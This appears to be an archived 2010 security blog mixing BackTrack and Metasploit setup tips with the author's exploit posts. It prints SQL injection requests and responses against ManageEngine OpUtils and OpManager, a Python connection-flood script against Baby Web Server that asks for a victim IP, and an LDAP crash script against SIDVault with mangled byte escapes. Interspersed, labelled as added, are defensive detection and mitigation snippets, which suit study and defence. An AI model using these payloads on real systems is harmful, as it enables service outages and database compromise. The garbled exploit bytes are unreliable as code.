Problem while connecting to the MySQL database
Solution
1) msf > db_driver
2) msf > db_driver mysql
3) root@bt:/pentest/exploits/framework3# mysql -u root -p
4) mysql> CREATE USER msf3@localhost IDENTIFIED BY 'test';
5) mysql> CREATE DATABASE msf3;
6) mysql> GRANT ALL PRIVILEGES ON msf3.* TO msf3@localhost;
Another problem while installing: if you are using sqlite3, then
root@bt:/pentest/exploits/armitage# ./armitage.sh
password is blank i.e
DB Connect String -
Wednesday, December 15, 2010
Armitage Setup
To install Armitage in BackTrack:
1) root@bt:~# apt-get update
2) root@bt:~# apt-get install armitage
3) root@bt:~# msfrpcd -f -U msf -P test -t Basic
4) root@bt:~# /etc/init.d/mysql start
5) root@bt:/pentest/exploits/armitage# ./armitage.sh
In BackTrack, the default MySQL credentials are root / toor and for PostgreSQL,
if using sqlite3, the password is blank.
6) Select the "Use SSL" checkbox, verify the rest of the settings and click "Connect".
Saturday, September 25, 2010
Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
Details of the PoC can be viewed at:
http://www.exploit-db.com/exploits/15061/
http://www.securityfocus.com/bid/43345/info
Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
by
Asheesh Kumar Mani Tripathi
# Vulnerability Discovered By Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
# Date 18th Sep 2010
# Description: Microsoft DRM technology (msnetobj.dll) ActiveX suffers from multiple remote vulnerabilities such as buffer overflow, integer overflow and denial of service (IE crash). This issue is triggered when an attacker convinces a victim user to visit a malicious website.
The "GetLicenseFromURLAsync" function does not handle input correctly.
Remote attackers may exploit this issue to execute arbitrary machine code in the context of the affected application, facilitating the remote compromise of affected computers. Failed exploit attempts likely result in browser crashes.
Wednesday, August 18, 2010
Problem: No Internet in BackTrack 4 (BT4)
1) Start the network.
On the command line, type:
bt# /etc/init.d/networking start
or Menu -> Services -> NETWORK -> Start NETWORK
Then configure the network card.
Static IP address:
ifconfig eth0 192.168.1.2
For a variable subnet mask:
ifconfig eth0 192.168.1.2 netmask 255.255.255.224
Add a default gateway:
route add default gw 192.168.1.1 eth0
Replace the IP address with your default gateway's.
Assign DNS servers:
echo nameserver 200.1.1.1 > /etc/resolv.conf
For DHCP:
dhcpcd eth0
Metasploit db_create error
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.
Solution
Just use
msf > db_driver sqlite3
or
msf > db_connect
Sunday, June 13, 2010
Installing Oracle Client using TOAD
1) Install the Oracle Instant Client (instantclient_10_2).
Unzip the files to a directory, and then copy the path of this directory to the clipboard.
2) Add this directory to the PATH environment variable.
Right-click on My Computer, go to the Advanced tab, and click 'Environment Variables'. Under System variables, find 'Path'. Select it and click Edit. Press Ctrl-V to paste the directory into the string, and click OK. E.g.:
Before:C:\Perl\bin\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\10.0\DLLShared\
After: C:\Perl\bin\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\10.0\DLLShared\;C:\instantclient_10_2
3) In the same window, under 'User variables for ...', click the New button. Call the variable 'TNS_ADMIN'. Press Ctrl-V to paste the directory path into the 'Variable value' field. Click OK, and close out the 'My Computer' properties windows.
E.g. Variable name: TNS_ADMIN
Variable value: C:\instantclient_10_2
4) Create a file called 'TNSNAMES.ORA' in your Instant Client installation directory. In this file, designate the connection parameters for your database. Mine looked something like this:
DB_ALIAS =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = ip.add.re.ss)(PORT = 1521))
)
(CONNECT_DATA =
(SID = orcl)
(SERVER = DEDICATED)
)
)
Replace the DB_ALIAS, ip.add.re.ss, port, and SID with your settings.
5) Restart your computer, fire up Toad, and then open a new connection. You should see DB_ALIAS as an option under the database field. Set your username and password, and hit Connect.
Friday, March 5, 2010
File association fixes for Windows Vista
This page contains the file association fixes for some of the most common file types. The fixes are applicable for Windows® Vista systems only.
http://www.winhelponline.com/articles/105/1/File-association-fixes-for-Windows-Vista.html
Broken EXE Association
Executable (.EXE) files are the programs you run for most tasks on a computer. Now and again someone reports that they have, in error, assigned some other program to the .EXE extension without first establishing a System Restore Point so they can recover from making this error. When that happens little will run on the computer. Instead, when an .EXE file is clicked some program will start and attempt to process that file instead.
http://filext.com/faq/broken_exe_association.php
Wednesday, March 3, 2010
Opera (plenitude String )Denial of Service Exploit
http://www.packetstormsecurity.org/1003-exploits/operaplen-crash.txt
http://www.exploit-db.com/exploits/11617
=======================================================================
Opera (plenitude String )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
#Download http://www.opera.com/download/
#Background
Opera is a popular internet browser :)
#Vulnerability
This bug is a typical result when an attacker tries to write a plenitude string in
the document.write() function. User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Proof of concept
Copy the code into a text file, save it as "asheesh.html" and open it in Mozilla Firefox.
Why do you worry without cause? Whom do you fear without reason? Who can kill you?
The soul is neither born, nor does it die.
#If you have any questions, comments, or concerns, feel free to contact me.
Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit
link:http://www.exploit-db.com/exploits/11617
link:http://www.packetstormsecurity.org/1003-exploits/mozff36-crash.txt
for code
=======================================================================
Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
#Download www.mozilla.com/firefox
#Background
Mozilla Firefox is a popular internet browser. .....:)
#Vulnerability
This bug is a typical result when an attacker tries to write a plenitude string in
the document.write() function. User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Mozilla crash :)
#Proof of concept
Copy the code into a text file and save it as "asheesh.html", and close all tabs and windows to avoid any loss of data.
Open it in Mozilla Firefox and wait for 15 sec ...... :) and say Good Bye
Mozilla .......
But before that, take one last look at Mozilla :) Say it with love: Jai Mata Di
Mozilla Rest In Peace!!!!!!!!!!!!!!!!!!!!!!!!!!!
BHAGAVAD GITA Quote
You came empty handed, you will leave empty handed. What is yours today, belonged to someone else yesterday, and will belong to someone else the day after tomorrow. So, whatever you do, do it as a dedication to God!
You came empty-handed and you will leave empty-handed. What is yours today was someone else's yesterday and will be someone else's the day after tomorrow. You are engrossed in it, thinking it is your own; this very pleasure is the cause of your sorrows.
#If you have any questions, comments, or concerns, feel free to contact me.
Thursday, February 18, 2010
Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
http://www.exploit-db.com/exploits/11438
http://seclists.org/fulldisclosure/2010/Feb/281
For the code, visit the links above, as scripts are not allowed in Blogger.
=======================================================================
Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company aksitservices
# Credit by Asheesh Anaconda
#Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
#Greets to Bhudeo Prasad for making shell script :)
#Background
Internet Explorer 8 is a popular internet browser, with lots of bugs .....:)
#Vulnerability
This bug is a typical result of a multitudinous loop.
The flaw exists within the "history go" ActiveX control, which contains
stack-based overflow conditions. User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
An attacker can run any Windows command, consume lots of memory, and crash your IE or make
your system inaccessible; your work, if any, might be lost.
#Proof of concept
Copy the code into a text file, save it as "asheesh.html" and open it in Internet Explorer 8.
========================================================================================================================
asheesh.html
========================================================================================================================
asheesh kumar mani tripathi
========================================================================================================================
#If you have any questions, comments, or concerns, feel free to contact me.
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
http://www.exploit-db.com/exploits/11432
http://seclists.org/fulldisclosure/2010/Feb/280
=======================================================================
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company aksitservices
# Credit by Asheesh Anaconda
#Download www.mozilla.com/firefox
#Background
Mozilla Firefox is a popular internet browser. .....:)
#Vulnerability
This bug is a typical result of a multitudinous loop.
The flaw exists when the attacker puts the window.printer() function
in a multitudinous loop. User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Proof of concept
Copy the code into a text file, save it as "asheesh.html" and open it in Mozilla Firefox.
========================================================================================================================
asheesh.html
========================================================================================================================
asheesh kumar mani tripathi
========================================================================================================================
#If you have any questions, comments, or concerns, feel free to contact me.
ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability
http://www.securityfocus.com/bid/38082/info
www.packetstormsecurity.org/1002-exploits/oputils_5-sql.txt
================================================================================
ManageEngine OpUtils 5 "Login.DO" SQL Injection Vulnerability
================================================================================
#Date-3/2/10
# code by Asheesh kumar Mani Tripathi
# AKS IT Services
# Credit by Asheesh Anaconda
#Download http://www.manageengine.com/products/oputils
#Vulnerability
ManageEngine OpUtils 5 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database
========================================================================================================================
Request
========================================================================================================================
POST /Login.do HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:7080/Login.do
Cookie: JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
Content-Type: application/x-www-form-urlencoded
Content-Length: 136
cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false"+and+31337-31337="0
========================================================================================================================
Response
========================================================================================================================
HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 03 Feb 2010 15:24:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 20583
Sunday, January 24, 2010
FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability
FileCOPA FTP Server is prone to a denial-of-service vulnerability.
A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html
find Details
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
Blind SQL/XPath injection in OPMANAGER
packetstormsecurity.org/0912-exploits/opmanager-sql.txt
http://www.exploit-db.com/exploits/10372
ManageEngine OpManager 'overview.do' SQL Injection Vulnerability
http://www.securityfocus.com/bid/37289
Exploit Code
*******************************Blind SQL/XPath injection in OPMANAGER***********************************
# Exploit Title: Blind SQL/XPath injection in OPMANAGER
# Date: 8-Dec-09
# Author: Asheesh Kumar Mani Tripathi
# AKS IT Services
# Software Link: http://www.manageengine.com/products/opmanager/download.html
# Version: [app version]
Description
SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable to SQL Injection.
XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
Impact
An unauthenticated attacker may execute arbitrary SQL/XPath statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.
Vulnerable:
http://overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX[SQL injection]&isFromInfra=yes HTTP/1.0
GET overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+31337-31337=0+--+&isFromInfra=yes HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost:8060
Cookie: JSESSIONID=54FA92CB3ADBA4C71B35C69251FFE9A1;flashversionInstalled=0.0.0
Connection: Close
Pragma: no-cache
Response:
HTTP/1.1 200 OK
Date: Tues, 08 Dec 2009 11:26:21 GMT
Server: Apache/2.0.47 (Win32) mod_jk/1.2.5
Connection: close
Content-Type: text/html;charset=UTF-8
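Detection logic for the probe shown in the request above, as an added example that is not part of the original advisory or OpManager's code: it scans access-log lines, URL-decodes every query parameter, and flags values where a quote is followed by an AND/OR comparison or by a trailing SQL comment. The log lines, client addresses, the `note` parameter and the rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines: one normal request, the probe from the
# advisory, the same probe percent-encoded, and a harmless apostrophe.
SAMPLE_LOG = """\
192.0.2.5 - - [08/Dec/2009:11:26:20 +0000] "GET /overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX&isFromInfra=yes HTTP/1.0" 200 512
192.0.2.9 - - [08/Dec/2009:11:26:21 +0000] "GET /overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+31337-31337=0+--+&isFromInfra=yes HTTP/1.0" 200 498
192.0.2.12 - - [08/Dec/2009:11:26:22 +0000] "GET /overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX%27%20and%2031337-31337%3D0%20--%20&isFromInfra=yes HTTP/1.0" 200 498
192.0.2.5 - - [08/Dec/2009:11:26:23 +0000] "GET /overview.do?selectedTab=Home&note=O%27Brien+and+sons HTTP/1.0" 200 120
""".splitlines()

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
RULES = [
    # A quote that closes the string literal, then AND/OR and a comparison.
    ("boolean-probe",
     re.compile(r"['\"]\s*(?:and|or)\s+[\w'\"+\- ]+=\s*[\w'\"]+", re.I)),
    # A quote followed later by a comment marker that ends the value,
    # cutting off the rest of the original statement.
    ("comment-tail", re.compile(r"['\"].*(?:--|#)\s*$")),
]

def scan(lines):
    """Return (client, parameter, [rule names]) for each suspicious value."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl decodes '+' and %xx, so both encodings hit the same rules.
        for name, value in parse_qsl(urlsplit(target).query,
                                     keep_blank_values=True):
            reasons = [label for label, rx in RULES if rx.search(value)]
            if reasons:
                findings.append((client, name, reasons))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matching on the decoded value is what catches the percent-encoded line; a pattern applied to the raw request string would miss it.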
Pablo Software Solutions Baby Web Server Multiple Request Remote Denial of Service Vulnerability
Pablo Software Solutions Baby Web Server is prone to a remote denial-of-service vulnerability. An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
http://exploits.offensive-security.com/record.php?id=10171&type=dos
packetstormsecurity.org/0911-exploits/babywebserver.py.txt
http://www.securityfocus.com/bid/36942
Exploit Code
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket
print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of requests "
print "*****************************************************"
host = "127.0.0.1"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    conn = s.connect(("127.0.0.1",80))
    for i in range (1,1100):
        request = "GET /some.txt HTTP/1.1 \n\n"
        connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connection.connect((host, port))
        connection.send(request)
        print i
except:
    print "Oh! Some Problem Occured Check Server is Running or Not"
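The script above opens 1099 connections from one source and never closes them. A mitigation sketch for that pattern, as an added example that is not part of the original post or Baby Web Server's code: a guard a server's accept loop can consult to cap both concurrent sockets and new connections per time window for each client address. The class name, limits and addresses are assumptions chosen for illustration.

```python
import time
from collections import defaultdict, deque

class ConnectionGuard:
    """Per-source limits: open sockets, and new connections per time window."""

    def __init__(self, max_open=20, max_new=60, window=10.0,
                 clock=time.monotonic):
        self.max_open, self.max_new, self.window = max_open, max_new, window
        self.clock = clock                 # injectable so tests can control time
        self.open = defaultdict(int)       # ip -> sockets currently open
        self.recent = defaultdict(deque)   # ip -> timestamps of recent accepts

    def admit(self, ip):
        """Call right after accept(); close the socket if this returns False."""
        now = self.clock()
        stamps = self.recent[ip]
        while stamps and now - stamps[0] > self.window:
            stamps.popleft()               # forget accepts older than the window
        if self.open[ip] >= self.max_open or len(stamps) >= self.max_new:
            return False
        self.open[ip] += 1
        stamps.append(now)
        return True

    def release(self, ip):
        """Call when an admitted connection is closed or hits its idle timeout."""
        if self.open[ip] > 0:
            self.open[ip] -= 1

def replay(guard, ip, attempts, close_each=False):
    """Feed `attempts` connections from one source; return how many got in."""
    admitted = 0
    for _ in range(attempts):
        if guard.admit(ip):
            admitted += 1
            if close_each:
                guard.release(ip)
    return admitted

if __name__ == "__main__":
    # Constructed scenario: 1099 connections from one address, none closed.
    print(replay(ConnectionGuard(), "192.0.2.10", 1099))
```

The concurrent cap only helps if idle sockets are eventually released, so pair it with a read timeout on each accepted connection.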
SIDVault Remote Denial of Service
#links-http://downloads.securityfocus.com/vulnerabilities/exploits/36394.py
#http://www.packetstormsecurity.org/0909-exploits/sidvault20evista-crash.txt
#http://inj3ct0r.com/%5Bremote%5D/1292
#SIDVault is prone to a remote denial-of-service vulnerability.
#Successful exploits allow remote attackers to cause the affected server to stop responding, denying service to legitimate users.
#SIDVault 2.0e for Windows is vulnerable; other versions may also be affected.
#!/usr/bin/python
#
# $ ./ldap.py
#
# SIDVault 2.0e Vista Remote Crash Vulnerability (sidvault.exe )
# Tested on Vista Home premium SP1 Windows XP ,SP1,SP2,SP3
# Coded by:asheesh anaconda
# Group DarkShinners
import sys
import socket
addr = "x33xbfx96x7c"
healthpacket = 'x41'*4095 + addr
evilpacket = '0x82x10/x02x01x01cx82x10(x04x82x10x06dc='
evilpacket += healthpacket
evilpacket += 'nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00'
print "[+] Sending evil packet"
print "[+] Wait ladp is getting crashh!!!!!!!!!!!!"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(evilpacket)
s.close()
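The script above sends an LDAP search whose base DN is `dc=` followed by 4095 filler bytes and four more bytes. A pre-parse length check for that field, as an added example that is not part of the original post or SIDVault's code: it walks the BER headers of an incoming LDAPMessage and rejects a SearchRequest whose baseObject exceeds a limit, or whose declared lengths do not fit the received data. `MAX_DN`, the function names and the sample messages are assumptions constructed for illustration.

```python
MAX_DN = 1024  # assumed policy limit for a distinguished name, in bytes

def read_tlv(buf, pos):
    """Parse one BER header at pos; return (tag, length, value_offset)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    length = first                        # short form: length fits in one byte
    if first >= 0x80:                     # long form: next n bytes hold it
        n = first & 0x7F
        if not 1 <= n <= 4 or pos + n > len(buf):
            raise ValueError("bad length encoding")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("declared length exceeds received data")
    return tag, length, pos

def check_ldap_message(msg):
    """Return 'accept' or a 'reject: ...' reason for one LDAPMessage."""
    try:
        tag, _, pos = read_tlv(msg, 0)             # LDAPMessage ::= SEQUENCE
        if tag != 0x30:
            return "reject: not a SEQUENCE"
        tag, length, pos = read_tlv(msg, pos)      # messageID INTEGER
        if tag != 0x02:
            return "reject: missing messageID"
        tag, _, pos = read_tlv(msg, pos + length)  # protocolOp
        if tag != 0x63:                            # only SearchRequest checked
            return "accept"
        tag, length, pos = read_tlv(msg, pos)      # baseObject LDAPDN
        if tag != 0x04 or length > MAX_DN:
            return "reject: baseObject tag 0x%02x, %d bytes" % (tag, length)
    except ValueError as exc:
        return "reject: %s" % exc
    return "accept"

def tlv(tag, value):  # BER encoder, used only to build the constructed samples
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(raw)]) + raw + value

def search_request(base_dn):
    """Constructed SearchRequest: subtree scope, filter (objectClass=*)."""
    body = (tlv(0x04, base_dn) + bytes.fromhex("0a01020a0100020100020100010100")
            + tlv(0x87, b"objectClass") + tlv(0x30, b""))
    return tlv(0x30, tlv(0x02, b"\x01") + tlv(0x63, body))
```

The check reads only headers and never copies the DN, so it can sit in a proxy or input filter in front of the directory service.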